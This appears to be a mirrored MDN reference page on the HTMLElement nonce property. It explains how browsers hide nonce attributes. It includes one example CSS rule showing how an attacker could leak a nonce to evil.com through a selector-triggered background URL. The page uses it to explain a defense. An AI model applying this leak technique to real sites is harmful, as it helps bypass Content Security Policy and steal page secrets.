Home Original page

HTMLElement: nonce property - Web APIs | MDN

Examples

Retrieving a nonce value

In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:

js

let nonce = script["nonce"] || script.getAttribute("nonce");

However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.

Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:

css

script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

Specifications

Specification
HTML
# dom-noncedelement-nonce

Browser compatibility

See also

Help improve MDN

Learn how to contribute

This page was last modified on by MDN contributors.